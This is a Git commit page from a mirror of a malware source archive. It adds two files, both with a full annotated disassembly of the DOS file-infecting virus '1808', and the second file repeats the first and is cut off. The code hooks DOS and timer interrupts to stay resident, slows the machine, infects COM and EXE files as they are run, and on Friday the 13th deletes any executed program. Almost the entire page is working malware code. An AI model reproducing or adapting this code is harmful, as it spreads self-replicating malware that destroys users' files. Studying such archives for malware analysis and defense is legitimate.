daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-22 18:59:23 +00:00
Code Issues Projects Releases Wiki Activity

re-organize

Browse Source 
push
This commit is contained in:
vxunderground
2022-08-21 04:07:57 -05:00
parent 74dbd37f30
commit 4b9382ddbc
1392 changed files with 607600 additions and 607600 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSDOS/J-Index/Virus.MSDOS.Unknown.j_1808.asm
+583
View File
@@ -0,0 +1,583 @@
;=======================================================================
; VIRUS 1808
; Virus se napojuje na preruseni 08 (hodiny) a zpomaluje chod pocitace.
;
;
;
45AD:0100 E99200 JMP 0195
0100 E9 92 00 73 55 4D 73 44-6F 73 00 01 77 14 00 00 i..sUMsDos..w...
0110 00 00 01 2C 02 70 00 1C-02 BC 0F EB 04 FE 0D C6 ...,.p...<.k.~.F
0120 5D 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ]...............
0130 00 F2 13 80 00 00 00 80-00 F2 13 5C 00 F2 13 6C .r.......r.\.r.l
0140 00 F2 13 10 07 82 2A C5-00 82 2A 00 F0 06 00 4D .r....*E..*.p..M
0150 5A 40 00 5D 01 00 00 20-00 2F 02 FF FF F3 2A 10 Z@.]... ./...s*.
0160 07 84 19 C5 00 F3 2A 1E-00 00 00 00 00 00 00 00 ...E.s*.........
0170 05 00 20 00 94 09 B0 B1-00 02 10 00 30 B1 02 00 .. ...01....01..
45AD:0195 FC CLD
45AD:0196 B4E0 MOV AH,E0 ;================================
45AD:0198 CD21 INT 21 ; Test pritomnosti v pamati.
45AD:019A 80FCE0 CMP AH,E0 ;
45AD:019D 7316 JNB 01B5
45AD:019F 80FC03 CMP AH,03
45AD:01A2 7211 JB 01B5
45AD:01A4 B4DD MOV AH,DD
45AD:01A6 BF0001 MOV DI,0100
45AD:01A9 BE1007 MOV SI,0710
45AD:01AC 03F7 ADD SI,DI
45AD:01AE 2E8B8D1100 MOV CX,CS:[DI+0011]
45AD:01B3 CD21 INT 21
45AD:01B5 8CC8 MOV AX,CS
45AD:01B7 051000 ADD AX,0010
45AD:01BA 8ED0 MOV SS,AX
45AD:01BC BC0007 MOV SP,0700
45AD:01BF 50 PUSH AX
45AD:01C0 B8C500 MOV AX,00C5
45AD:01C3 50 PUSH AX
45AD:01C4 CB RETF ; Jdeme na nasledujici radek.
;=========================================================================
45BD:00C5 FC CLD ;
45BD:00C6 06 PUSH ES
45BD:00C7 2E8C063100 MOV CS:[0031],ES
45BD:00CC 2E8C063900 MOV CS:[0039],ES
45BD:00D1 2E8C063D00 MOV CS:[003D],ES
45BD:00D6 2E8C064100 MOV CS:[0041],ES
45BD:00DB 8CC0 MOV AX,ES
45BD:00DD 051000 ADD AX,0010
45BD:00E0 2E01064900 ADD CS:[0049],AX
45BD:00E5 2E01064500 ADD CS:[0045],AX
45BD:00EA B4E0 MOV AH,E0 ;=========================
45BD:00EC CD21 INT 21 ;
45BD:00EE 80FCE0 CMP AH,E0 ;
45BD:00F1 7313 JNB 0106 ;=========================
45BD:00F3 80FC03 CMP AH,03 ; VIRUS JE INSTALOVAN.
45BD:00F6 07 POP ES
45BD:00F7 2E8E164500 MOV SS,CS:[0045]
45BD:00FC 2E8B264300 MOV SP,CS:[0043]
45BD:0101 2EFF2E4700 JMP FAR CS:[0047]
45BD:0106 33C0 XOR AX,AX ;=========================
45BD:0108 8EC0 MOV ES,AX ; VIRUS NENI INSTALOVAN.
45BD:010A 26A1FC03 MOV AX,ES:[03FC] ; Prerusovaci vektor 255.
45BD:010E 2EA34B00 MOV CS:[004B],AX ; Je definovan kod
45BD:0112 26A0FE03 MOV AL,ES:[03FE] ; 0000:03FC F3 REPZ
45BD:0116 2EA24D00 MOV CS:[004D],AL 0000:03FD A5 MOVSW
45BD:011A 26C706FC03F3A5 MOV Word Ptr ES:[03FC],A5F3 0000:03FE CB RETF
45BD:0121 26C606FE03CB MOV Byte Ptr ES:[03FE],CB
45BD:0127 58 POP AX
45BD:0128 051000 ADD AX,0010
45BD:012B 8EC0 MOV ES,AX
45BD:012D 0E PUSH CS
45BD:012E 1F POP DS
45BD:012F B91007 MOV CX,0710
45BD:0132 D1E9 SHR CX,1
45BD:0134 33F6 XOR SI,SI
45BD:0136 8BFE MOV DI,SI
45BD:0138 06 PUSH ES
45BD:0139 B84201 MOV AX,0142
45BD:013C 50 PUSH AX
45BD:013D EAFC030000 JMP 0000:03FC ;========================
45BD:0142 8CC8 MOV AX,CS ; Po skoku pokracujeme
45BD:0144 8ED0 MOV SS,AX ; na 45BD:142
45BD:0146 BC0007 MOV SP,0700
45BD:0149 33C0 XOR AX,AX ;========================
45BD:014B 8ED8 MOV DS,AX ;
45BD:014D 2EA14B00 MOV AX,CS:[004B] ; Obnoveni puvodni hodno-
45BD:0151 A3FC03 MOV [03FC],AX ; ty preruseni 255.
45BD:0154 2EA04D00 MOV AL,CS:[004D]
45BD:0158 A2FE03 MOV [03FE],AL
45BD:015B 8BDC MOV BX,SP ; Velikost programu v
45BD:015D B104 MOV CL,04 ; paragrafech.
45BD:015F D3EB SHR BX,CL
45BD:0161 83C310 ADD BX,+10
45BD:0164 2E891E3300 MOV CS:[0033],BX ; Zmen velikost alokovane
45BD:0169 B44A MOV AH,4A ; pameti.
45BD:016B 2E8E063100 MOV ES,CS:[0031] ;
45BD:0170 CD21 INT 21 ;========================
45BD:0172 B82135 MOV AX,3521 ; Cti preruseni 21H.
45BD:0175 CD21 INT 21 ;
45BD:0177 2E891E1700 MOV CS:[0017],BX ;
45BD:017C 2E8C061900 MOV CS:[0019],ES ;========================
45BD:0181 0E PUSH CS
45BD:0182 1F POP DS
45BD:0183 BA5B02 MOV DX,025B ; Definice noveho vektoru
45BD:0186 B82125 MOV AX,2521 ; preruseni 21H.
45BD:0189 CD21 INT 21 ;========================
45BD:018B 8E063100 MOV ES,[0031]
45BD:018F 268E062C00 MOV ES,ES:[002C]
45BD:0194 33FF XOR DI,DI
45BD:0196 B9FF7F MOV CX,7FFF
45BD:0199 32C0 XOR AL,AL
45BD:019B F2 REPNZ
45BD:019C AE SCASB
45BD:019D 263805 CMP ES:[DI],AL
45BD:01A0 E0F9 LOOPNZ 019B
45BD:01A2 8BD7 MOV DX,DI
45BD:01A4 83C203 ADD DX,+03
45BD:01A7 B8004B MOV AX,4B00
45BD:01AA 06 PUSH ES
45BD:01AB 1F POP DS
45BD:01AC 0E PUSH CS
45BD:01AD 07 POP ES
45BD:01AE BB3500 MOV BX,0035
45BD:01B1 1E PUSH DS
45BD:01B2 06 PUSH ES
45BD:01B3 50 PUSH AX
45BD:01B4 53 PUSH BX
45BD:01B5 51 PUSH CX
45BD:01B6 52 PUSH DX
45BD:01B7 B42A MOV AH,2A ; DATUM
45BD:01B9 CD21 INT 21 ;======================
45BD:01BB 2EC6060E0000 MOV Byte Ptr CS:[000E],00
45BD:01C1 81F9C307 CMP CX,07C3 ; Virus se nemnozi roku
45BD:01C5 7430 JZ 01F7 ; 1987, v patek 13 maze
45BD:01C7 3C05 CMP AL,05 ; spustene soubory.
45BD:01C9 750D JNZ 01D8
45BD:01CB 80FA0D CMP DL,0D
45BD:01CE 7508 JNZ 01D8
45BD:01D0 2EFE060E00 INC Byte Ptr CS:[000E]
45BD:01D5 EB20 JMP 01F7
45BD:01D7 90 NOP
45BD:01D8 B80835 MOV AX,3508 ;=======================
45BD:01DB CD21 INT 21 ; Redefinice preruseni
45BD:01DD 2E891E1300 MOV CS:[0013],BX ; 08.
45BD:01E2 2E8C061500 MOV CS:[0015],ES
45BD:01E7 0E PUSH CS
45BD:01E8 1F POP DS
45BD:01E9 C7061F00907E MOV Word Ptr [001F],7E90
45BD:01EF B80825 MOV AX,2508
45BD:01F2 BA1E02 MOV DX,021E ;
45BD:01F5 CD21 INT 21 ;=======================
45BD:01F7 5A POP DX
45BD:01F8 59 POP CX
45BD:01F9 5B POP BX
45BD:01FA 58 POP AX
45BD:01FB 07 POP ES
45BD:01FC 1F POP DS
45BD:01FD 9C PUSHF
45BD:01FE 2EFF1E1700 CALL FAR CS:[0017] ; LOAD AND EXECUTE.
45BD:0203 1E PUSH DS ;
45BD:0204 07 POP ES
45BD:0205 B449 MOV AH,49
45BD:0207 CD21 INT 21
45BD:0209 B44D MOV AH,4D
45BD:020B CD21 INT 21
45BD:020D B431 MOV AH,31
45BD:020F BA0006 MOV DX,0600
45BD:0212 B104 MOV CL,04
45BD:0214 D3EA SHR DX,CL
45BD:0216 83C210 ADD DX,+10
45BD:0219 CD21 INT 21
45BD:021B 32C0 XOR AL,AL
45BD:021D CF IRET
;
;=======================================================================
; OBSLUHA PRERUSENI 08.
;
45BD:021E 2E833E1F0002 CMP Word Ptr CS:[001F],+02
45BD:0224 7517 JNZ 023D
45BD:0226 50 PUSH AX
45BD:0227 53 PUSH BX
45BD:0228 51 PUSH CX
45BD:0229 52 PUSH DX
45BD:022A 55 PUSH BP
45BD:022B B80206 MOV AX,0602
45BD:022E B787 MOV BH,87
45BD:0230 B90505 MOV CX,0505
45BD:0233 BA1010 MOV DX,1010
45BD:0236 CD10 INT 10
45BD:0238 5D POP BP
45BD:0239 5A POP DX
45BD:023A 59 POP CX
45BD:023B 5B POP BX
45BD:023C 58 POP AX
45BD:023D 2EFF0E1F00 DEC Word Ptr CS:[001F]
45BD:0242 7512 JNZ 0256
45BD:0244 2EC7061F000100 MOV Word Ptr CS:[001F],0001
45BD:024B 50 PUSH AX
45BD:024C 51 PUSH CX
45BD:024D 56 PUSH SI
45BD:024E B90140 MOV CX,4001
45BD:0251 F3 REPZ
45BD:0252 AC LODSB
45BD:0253 5E POP SI
45BD:0254 59 POP CX
45BD:0255 58 POP AX
45BD:0256 2EFF2E1300 JMP FAR CS:[0013]
;
;=======================================================================
; OBSLUHA PRERUSENI 21H.
;
45BD:025B 9C PUSHF
45BD:025C 80FCE0 CMP AH,E0
45BD:025F 7505 JNZ 0266
45BD:0261 B80003 MOV AX,0300 ; Test pritomnosti.
45BD:0264 9D POPF ;
45BD:0265 CF IRET ;==========================
45BD:0266 80FCDD CMP AH,DD ;
45BD:0269 7413 JZ 027E
45BD:026B 80FCDE CMP AH,DE
45BD:026E 7428 JZ 0298
45BD:0270 3D004B CMP AX,4B00 ; LOAD AND EXECUTE.
45BD:0273 7503 JNZ 0278
45BD:0275 E9B400 JMP 032C
45BD:0278 9D POPF
45BD:0279 2EFF2E1700 JMP FAR CS:[0017] ; Puvodni obsluha.
;==============================================
45BD:027E 58 POP AX ; Obsluha kodu 0DDH.
45BD:027F 58 POP AX
45BD:0280 B80001 MOV AX,0100
45BD:0283 2EA30A00 MOV CS:[000A],AX
45BD:0287 58 POP AX
45BD:0288 2EA30C00 MOV CS:[000C],AX
45BD:028C F3 REPZ
45BD:028D A4 MOVSB
45BD:028E 9D POPF
45BD:028F 2EA10F00 MOV AX,CS:[000F]
45BD:0293 2EFF2E0A00 JMP FAR CS:[000A]
;==============================================
45BD:0298 83C406 ADD SP,+06 ; Obsluha kodu 0DEH.
45BD:029B 9D POPF
45BD:029C 8CC8 MOV AX,CS
45BD:029E 8ED0 MOV SS,AX
45BD:02A0 BC1007 MOV SP,0710
45BD:02A3 06 PUSH ES
45BD:02A4 06 PUSH ES
45BD:02A5 33FF XOR DI,DI
45BD:02A7 0E PUSH CS
45BD:02A8 07 POP ES
45BD:02A9 B91000 MOV CX,0010
45BD:02AC 8BF3 MOV SI,BX
45BD:02AE BF2100 MOV DI,0021
45BD:02B1 F3 REPZ
45BD:02B2 A4 MOVSB
45BD:02B3 8CD8 MOV AX,DS
45BD:02B5 8EC0 MOV ES,AX
45BD:02B7 2EF7267A00 MUL Word Ptr CS:[007A]
45BD:02BC 2E03062B00 ADD AX,CS:[002B]
45BD:02C1 83D200 ADC DX,+00
45BD:02C4 2EF7367A00 DIV Word Ptr CS:[007A]
45BD:02C9 8ED8 MOV DS,AX
45BD:02CB 8BF2 MOV SI,DX
45BD:02CD 8BFA MOV DI,DX
45BD:02CF 8CC5 MOV BP,ES
45BD:02D1 2E8B1E2F00 MOV BX,CS:[002F]
45BD:02D6 0BDB OR BX,BX
45BD:02D8 7413 JZ 02ED
45BD:02DA B90080 MOV CX,8000
45BD:02DD F3 REPZ
45BD:02DE A5 MOVSW
45BD:02DF 050010 ADD AX,1000
45BD:02E2 81C50010 ADD BP,1000
45BD:02E6 8ED8 MOV DS,AX
45BD:02E8 8EC5 MOV ES,BP
45BD:02EA 4B DEC BX
45BD:02EB 75ED JNZ 02DA
45BD:02ED 2E8B0E2D00 MOV CX,CS:[002D]
45BD:02F2 F3 REPZ
45BD:02F3 A4 MOVSB
45BD:02F4 58 POP AX
45BD:02F5 50 PUSH AX
45BD:02F6 051000 ADD AX,0010
45BD:02F9 2E01062900 ADD CS:[0029],AX
45BD:02FE 2E01062500 ADD CS:[0025],AX
45BD:0303 2EA12100 MOV AX,CS:[0021]
45BD:0307 1F POP DS
45BD:0308 07 POP ES
45BD:0309 2E8E162900 MOV SS,CS:[0029]
45BD:030E 2E8B262700 MOV SP,CS:[0027]
45BD:0313 2EFF2E2300 JMP FAR CS:[0023]
;==============================================
45BD:0318 33C9 XOR CX,CX ; Vymazani souboru.
45BD:031A B80143 MOV AX,4301 ; Zmen atributy souboru.
45BD:031D CD21 INT 21 ;
45BD:031F B441 MOV AH,41 ; Vymaz
45BD:0321 CD21 INT 21
45BD:0323 B8004B MOV AX,4B00 ; a vykonej.
45BD:0326 9D POPF
45BD:0327 2EFF2E1700 JMP FAR CS:[0017] ; FUNGUJE v patek 13.
;==============================================
45BD:032C 2E803E0E0001 CMP Byte Ptr CS:[000E],01 ; LOAD & EXECUTE.
45BD:0332 74E4 JZ 0318
45BD:0334 2EC7067000FFFF MOV Word Ptr CS:[0070],FFFF
45BD:033B 2EC7068F000000 MOV Word Ptr CS:[008F],0000
45BD:0342 2E89168000 MOV CS:[0080],DX
45BD:0347 2E8C1E8200 MOV CS:[0082],DS
45BD:034C 50 PUSH AX
45BD:034D 53 PUSH BX
45BD:034E 51 PUSH CX
45BD:034F 52 PUSH DX
45BD:0350 56 PUSH SI
45BD:0351 57 PUSH DI
45BD:0352 1E PUSH DS
45BD:0353 06 PUSH ES
45BD:0354 FC CLD
45BD:0355 8BFA MOV DI,DX
45BD:0357 32D2 XOR DL,DL
45BD:0359 807D013A CMP Byte Ptr [DI+01],3A
45BD:035D 7505 JNZ 0364 ;
45BD:035F 8A15 MOV DL,[DI] ; Volny prostor na disku.
45BD:0361 80E21F AND DL,1F
45BD:0364 B436 MOV AH,36
45BD:0366 CD21 INT 21
45BD:0368 3DFFFF CMP AX,FFFF
45BD:036B 7503 JNZ 0370
45BD:036D E97702 JMP 05E7 ;==========================
45BD:0370 F7E3 MUL BX ; Vypocet volneho prostoru.
45BD:0372 F7E1 MUL CX
45BD:0374 0BD2 OR DX,DX
45BD:0376 7505 JNZ 037D
45BD:0378 3D1007 CMP AX,0710 ; Je dost mista na VIRUS?
45BD:037B 72F0 JB 036D
45BD:037D 2E8B168000 MOV DX,CS:[0080]
45BD:0382 1E PUSH DS
45BD:0383 07 POP ES
45BD:0384 32C0 XOR AL,AL
45BD:0386 B94100 MOV CX,0041
45BD:0389 F2 REPNZ ; Hledani konce retezce.
45BD:038A AE SCASB
45BD:038B 2E8B368000 MOV SI,CS:[0080]
45BD:0390 8A04 MOV AL,[SI]
45BD:0392 0AC0 OR AL,AL
45BD:0394 740E JZ 03A4
45BD:0396 3C61 CMP AL,61
45BD:0398 7207 JB 03A1
45BD:039A 3C7A CMP AL,7A
45BD:039C 7703 JA 03A1
45BD:039E 802C20 SUB Byte Ptr [SI],20
45BD:03A1 46 INC SI
45BD:03A2 EBEC JMP 0390
45BD:03A4 B90B00 MOV CX,000B
45BD:03A7 2BF1 SUB SI,CX
45BD:03A9 BF8400 MOV DI,0084
45BD:03AC 0E PUSH CS
45BD:03AD 07 POP ES
45BD:03AE B90B00 MOV CX,000B
45BD:03B1 F3 REPZ ; VIRUS neinfikuje
45BD:03B2 A6 CMPSB ; COMMAND.COM
45E3:03B3 7503 JNZ 03B8
45E3:03B5 E92F02 JMP 05E7
45E3:03B8 B80043 MOV AX,4300 ; Zjisti atributy
45E3:03BB CD21 INT 21 ; souboru.
45E3:03BD 7205 JB 03C4
45E3:03BF 2E890E7200 MOV CS:[0072],CX
45E3:03C4 7225 JB 03EB
45E3:03C6 32C0 XOR AL,AL
45E3:03C8 2EA24E00 MOV CS:[004E],AL
45E3:03CC 1E PUSH DS
45E3:03CD 07 POP ES
45E3:03CE 8BFA MOV DI,DX
45E3:03D0 B94100 MOV CX,0041
45E3:03D3 F2 REPNZ
45E3:03D4 AE SCASB
45E3:03D5 807DFE4D CMP Byte Ptr [DI-02],4D ; Rozeznani COM
45E3:03D9 740B JZ 03E6 ; a EXE souboru.
45E3:03DB 807DFE6D CMP Byte Ptr [DI-02],6D
45E3:03DF 7405 JZ 03E6
45E3:03E1 2EFE064E00 INC Byte Ptr CS:[004E]
45E3:03E6 B8003D MOV AX,3D00 ; Otevri soubor.
45E3:03E9 CD21 INT 21
45E3:03EB 725A JB 0447
45E3:03ED 2EA37000 MOV CS:[0070],AX
45E3:03F1 8BD8 MOV BX,AX
45E3:03F3 B80242 MOV AX,4202 ; Posun R/W pointer.
45E3:03F6 B9FFFF MOV CX,FFFF ; 5 byte od konce
45E3:03F9 BAFBFF MOV DX,FFFB ; souboru.
45E3:03FC CD21 INT 21 ;=====================
45E3:03FE 72EB JB 03EB
45E3:0400 050500 ADD AX,0005
45E3:0403 2EA31100 MOV CS:[0011],AX
45E3:0407 B90500 MOV CX,0005
45E3:040A BA6B00 MOV DX,006B ; Cti ze souboru
45E3:040D 8CC8 MOV AX,CS ; 5 byte (CS:6B)
45E3:040F 8ED8 MOV DS,AX
45E3:0411 8EC0 MOV ES,AX
45E3:0413 B43F MOV AH,3F
45E3:0415 CD21 INT 21
45E3:0417 8BFA MOV DI,DX
45E3:0419 BE0500 MOV SI,0005 ; Rozpoznavaci kod je
45E3:041C F3 REPZ ; MsDos.
45E3:041D A6 CMPSB
45E3:041E 7507 JNZ 0427
45E3:0420 B43E MOV AH,3E ; Soubor je nakazen.
45E3:0422 CD21 INT 21
45E3:0424 E9C001 JMP 05E7
45E3:0427 B82435 MOV AX,3524
45E3:042A CD21 INT 21
45E3:042C 891E1B00 MOV [001B],BX
45E3:0430 8C061D00 MOV [001D],ES
45E3:0434 BA1B02 MOV DX,021B
45E3:0437 B82425 MOV AX,2524
45E3:043A CD21 INT 21
45E3:043C C5168000 LDS DX,[0080]
45E3:0440 33C9 XOR CX,CX
45E3:0442 B80143 MOV AX,4301
45E3:0445 CD21 INT 21
45E3:0447 723B JB 0484
45E3:0449 2E8B1E7000 MOV BX,CS:[0070]
45E3:044E B43E MOV AH,3E
45E3:0450 CD21 INT 21
45E3:0452 2EC7067000FFFF MOV Word Ptr CS:[0070],FFFF
45E3:0459 B8023D MOV AX,3D02
45E3:045C CD21 INT 21
45E3:045E 7224 JB 0484
45E3:0460 2EA37000 MOV CS:[0070],AX
45E3:0464 8CC8 MOV AX,CS
45E3:0466 8ED8 MOV DS,AX
45E3:0468 8EC0 MOV ES,AX
45E3:046A 8B1E7000 MOV BX,[0070]
45E3:046E B80057 MOV AX,5700
45E3:0471 CD21 INT 21
45E3:0473 89167400 MOV [0074],DX
45E3:0477 890E7600 MOV [0076],CX
45E3:047B B80042 MOV AX,4200
45E3:047E 33C9 XOR CX,CX
45E3:0480 8BD1 MOV DX,CX
45E3:0482 CD21 INT 21
45E3:0484 723D JB 04C3
45E3:0486 803E4E0000 CMP Byte Ptr [004E],00
45E3:048B 7403 JZ 0490
45E3:048D EB57 JMP 04E6
45E3:048F 90 NOP
45E3:0490 BB0010 MOV BX,1000
45E3:0493 B448 MOV AH,48
45E3:0495 CD21 INT 21
45E3:0497 730B JNB 04A4
45E3:0499 B43E MOV AH,3E
45E3:049B 8B1E7000 MOV BX,[0070]
45E3:049F CD21 INT 21
45E3:04A1 E94301 JMP 05E7
45E3:04A4 FF068F00 INC Word Ptr [008F]
45E3:04A8 8EC0 MOV ES,AX
45E3:04AA 33F6 XOR SI,SI
45E3:04AC 8BFE MOV DI,SI
45E3:04AE B91007 MOV CX,0710
45E3:04B1 F3 REPZ
45E3:04B2 A4 MOVSB
45E3:04B3 8BD7 MOV DX,DI
45E3:04B5 8B0E1100 MOV CX,[0011]
45E3:04B9 8B1E7000 MOV BX,[0070]
45E3:04BD 06 PUSH ES
45E3:04BE 1F POP DS
45E3:04BF B43F MOV AH,3F
45E3:04C1 CD21 INT 21
45E3:04C3 721C JB 04E1
45E3:04C5 03F9 ADD DI,CX
45E3:04C7 33C9 XOR CX,CX
45E3:04C9 8BD1 MOV DX,CX
45E3:04CB B80042 MOV AX,4200
45E3:04CE CD21 INT 21
45E3:04D0 BE0500 MOV SI,0005
45E3:04D3 B90500 MOV CX,0005
45E3:04D6 F3 REPZ
45E3:04D7 2EA4 MOVSB CS:
45E3:04D9 8BCF MOV CX,DI
45E3:04DB 33D2 XOR DX,DX
45E3:04DD B440 MOV AH,40
45E3:04DF CD21 INT 21
45E3:04E1 720D JB 04F0
45E3:04E3 E9BC00 JMP 05A2
45E3:04E6 B91C00 MOV CX,001C
45E3:04E9 BA4F00 MOV DX,004F
45E3:04EC B43F MOV AH,3F
45E3:04EE CD21 INT 21
45E3:04F0 724A JB 053C
45E3:04F2 C70661008419 MOV Word Ptr [0061],1984
45E3:04F8 A15D00 MOV AX,[005D]
45E3:04FB A34500 MOV [0045],AX
45E3:04FE A15F00 MOV AX,[005F]
45E3:0501 A34300 MOV [0043],AX
45E3:0504 A16300 MOV AX,[0063]
45E3:0507 A34700 MOV [0047],AX
45E3:050A A16500 MOV AX,[0065]
45E3:050D A34900 MOV [0049],AX
45E3:0510 A15300 MOV AX,[0053]
45E3:0513 833E510000 CMP Word Ptr [0051],+00
45E3:0518 7401 JZ 051B
45E3:051A 48 DEC AX
45E3:051B F7267800 MUL Word Ptr [0078]
45E3:051F 03065100 ADD AX,[0051]
45E3:0523 83D200 ADC DX,+00
45E3:0526 050F00 ADD AX,000F
45E3:0529 83D200 ADC DX,+00
45E3:052C 25F0FF AND AX,FFF0
45E3:052F A37C00 MOV [007C],AX
45E3:0532 89167E00 MOV [007E],DX
45E3:0536 051007 ADD AX,0710
45E3:0539 83D200 ADC DX,+00
45E3:053C 723A JB 0578
45E3:053E F7367800 DIV Word Ptr [0078]
45E3:0542 0BD2 OR DX,DX
45E3:0544 7401 JZ 0547
45E3:0546 40 INC AX
45E3:0547 A35300 MOV [0053],AX
45E3:054A 89165100 MOV [0051],DX
45E3:054E A17C00 MOV AX,[007C]
45E3:0551 8B167E00 MOV DX,[007E]
45E3:0555 F7367A00 DIV Word Ptr [007A]
45E3:0559 2B065700 SUB AX,[0057]
45E3:055D A36500 MOV [0065],AX
45E3:0560 C7066300C500 MOV Word Ptr [0063],00C5
45E3:0566 A35D00 MOV [005D],AX
45E3:0569 C7065F001007 MOV Word Ptr [005F],0710
45E3:056F 33C9 XOR CX,CX
45E3:0571 8BD1 MOV DX,CX
45E3:0573 B80042 MOV AX,4200
45E3:0576 CD21 INT 21
45E3:0578 720A JB 0584
45E3:057A B91C00 MOV CX,001C
45E3:057D BA4F00 MOV DX,004F
45E3:0580 B440 MOV AH,40
45E3:0582 CD21 INT 21
45E3:0584 7211 JB 0597
45E3:0586 3BC1 CMP AX,CX
45E3:0588 7518 JNZ 05A2
45E3:058A 8B167C00 MOV DX,[007C]
45E3:058E 8B0E7E00 MOV CX,[007E]
45E3:0592 B80042 MOV AX,4200
45E3:0595 CD21 INT 21
45E3:0597 7209 JB 05A2
45E3:0599 33D2 XOR DX,DX
45E3:059B B91007 MOV CX,0710
45E3:059E B440 MOV AH,40
45E3:05A0 CD21 INT 21
45E3:05A2 2E833E8F0000 CMP Word Ptr CS:[008F],+00
45E3:05A8 7404 JZ 05AE
45E3:05AA B449 MOV AH,49
45E3:05AC CD21 INT 21
45E3:05AE 2E833E7000FF CMP Word Ptr CS:[0070],-01
45E3:05B4 7431 JZ 05E7
45E3:05B6 2E8B1E7000 MOV BX,CS:[0070]
45E3:05BB 2E8B167400 MOV DX,CS:[0074]
45E3:05C0 2E8B0E7600 MOV CX,CS:[0076]
45E3:05C5 B80157 MOV AX,5701
45E3:05C8 CD21 INT 21
45E3:05CA B43E MOV AH,3E
45E3:05CC CD21 INT 21
45E3:05CE 2EC5168000 LDS DX,CS:[0080]
45E3:05D3 2E8B0E7200 MOV CX,CS:[0072]
45E3:05D8 B80143 MOV AX,4301
45E3:05DB CD21 INT 21
45E3:05DD 2EC5161B00 LDS DX,CS:[001B]
45E3:05E2 B82425 MOV AX,2524
45E3:05E5 CD21 INT 21
45E3:05E7 07 POP ES
45E3:05E8 1F POP DS
45E3:05E9 5F POP DI
45E3:05EA 5E POP SI
45E3:05EB 5A POP DX
45E3:05EC 59 POP CX
45E3:05ED 5B POP BX
45E3:05EE 58 POP AX
45E3:05EF 9D POPF
45E3:05F0 2EFF2E1700 JMP FAR CS:[0017]
45E3:05F0 00 00 00-00 00 00 00 00 00 00 00 ...........
45E3:0600 F2 13 50 43 54 4F 4F 4C-53 2E 45 58 45 00 22 2F r.PCTOOLS.EXE."/
45E3:0610 01 FE 0D 00 8B 00 F0 F0-83 F2 F4 03 00 0F 00 00 .~....pp.rt.....
45E3:0620 4D FE 0D 04 00 45 43 3D-43 3A 5C 43 4F 4D 4D 41 M~...EC=C:\COMMA
45E3:0630 00 47 02 00 00 32 00 FF-FF FF FF FF FF FF FF FF .G...2..........
45E3:0640 FF FF FF FF FF FF FF FF-FF 43 3A 5C 5A 53 53 52 .........C:\ZSSR
45E3:0650 5C 4B 41 4C 49 42 52 5C-4B 41 49 4B 49 2E 42 41 \KALIBR\KAIKI.BA
45E3:0660 54 00 6B 61 69 6B 69 0D-00 FF FF FF 00 00 00 00 T.kaiki.........
45E3:0670 4D FE 0D 00 10 M~...
45E3:0670 00 00 00-00 00 00 00 00 00 00 00 ...........
45E3:0680 E9 92 00 73 55 4D 73 44-6F 73 00 01 77 i..sUMsDos
MSDOS/J-Index/Virus.MSDOS.Unknown.j_1808.lst
+583
View File
@@ -0,0 +1,583 @@
;=======================================================================
; VIRUS 1808
; Virus se napojuje na preruseni 08 (hodiny) a zpomaluje chod pocitace.
;
;
;
45AD:0100 E99200 JMP 0195
0100 E9 92 00 73 55 4D 73 44-6F 73 00 01 77 14 00 00 i..sUMsDos..w...
0110 00 00 01 2C 02 70 00 1C-02 BC 0F EB 04 FE 0D C6 ...,.p...<.k.~.F
0120 5D 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ]...............
0130 00 F2 13 80 00 00 00 80-00 F2 13 5C 00 F2 13 6C .r.......r.\.r.l
0140 00 F2 13 10 07 82 2A C5-00 82 2A 00 F0 06 00 4D .r....*E..*.p..M
0150 5A 40 00 5D 01 00 00 20-00 2F 02 FF FF F3 2A 10 Z@.]... ./...s*.
0160 07 84 19 C5 00 F3 2A 1E-00 00 00 00 00 00 00 00 ...E.s*.........
0170 05 00 20 00 94 09 B0 B1-00 02 10 00 30 B1 02 00 .. ...01....01..
45AD:0195 FC CLD
45AD:0196 B4E0 MOV AH,E0 ;================================
45AD:0198 CD21 INT 21 ; Test pritomnosti v pamati.
45AD:019A 80FCE0 CMP AH,E0 ;
45AD:019D 7316 JNB 01B5
45AD:019F 80FC03 CMP AH,03
45AD:01A2 7211 JB 01B5
45AD:01A4 B4DD MOV AH,DD
45AD:01A6 BF0001 MOV DI,0100
45AD:01A9 BE1007 MOV SI,0710
45AD:01AC 03F7 ADD SI,DI
45AD:01AE 2E8B8D1100 MOV CX,CS:[DI+0011]
45AD:01B3 CD21 INT 21
45AD:01B5 8CC8 MOV AX,CS
45AD:01B7 051000 ADD AX,0010
45AD:01BA 8ED0 MOV SS,AX
45AD:01BC BC0007 MOV SP,0700
45AD:01BF 50 PUSH AX
45AD:01C0 B8C500 MOV AX,00C5
45AD:01C3 50 PUSH AX
45AD:01C4 CB RETF ; Jdeme na nasledujici radek.
;=========================================================================
45BD:00C5 FC CLD ;
45BD:00C6 06 PUSH ES
45BD:00C7 2E8C063100 MOV CS:[0031],ES
45BD:00CC 2E8C063900 MOV CS:[0039],ES
45BD:00D1 2E8C063D00 MOV CS:[003D],ES
45BD:00D6 2E8C064100 MOV CS:[0041],ES
45BD:00DB 8CC0 MOV AX,ES
45BD:00DD 051000 ADD AX,0010
45BD:00E0 2E01064900 ADD CS:[0049],AX
45BD:00E5 2E01064500 ADD CS:[0045],AX
45BD:00EA B4E0 MOV AH,E0 ;=========================
45BD:00EC CD21 INT 21 ;
45BD:00EE 80FCE0 CMP AH,E0 ;
45BD:00F1 7313 JNB 0106 ;=========================
45BD:00F3 80FC03 CMP AH,03 ; VIRUS JE INSTALOVAN.
45BD:00F6 07 POP ES
45BD:00F7 2E8E164500 MOV SS,CS:[0045]
45BD:00FC 2E8B264300 MOV SP,CS:[0043]
45BD:0101 2EFF2E4700 JMP FAR CS:[0047]
45BD:0106 33C0 XOR AX,AX ;=========================
45BD:0108 8EC0 MOV ES,AX ; VIRUS NENI INSTALOVAN.
45BD:010A 26A1FC03 MOV AX,ES:[03FC] ; Prerusovaci vektor 255.
45BD:010E 2EA34B00 MOV CS:[004B],AX ; Je definovan kod
45BD:0112 26A0FE03 MOV AL,ES:[03FE] ; 0000:03FC F3 REPZ
45BD:0116 2EA24D00 MOV CS:[004D],AL 0000:03FD A5 MOVSW
45BD:011A 26C706FC03F3A5 MOV Word Ptr ES:[03FC],A5F3 0000:03FE CB RETF
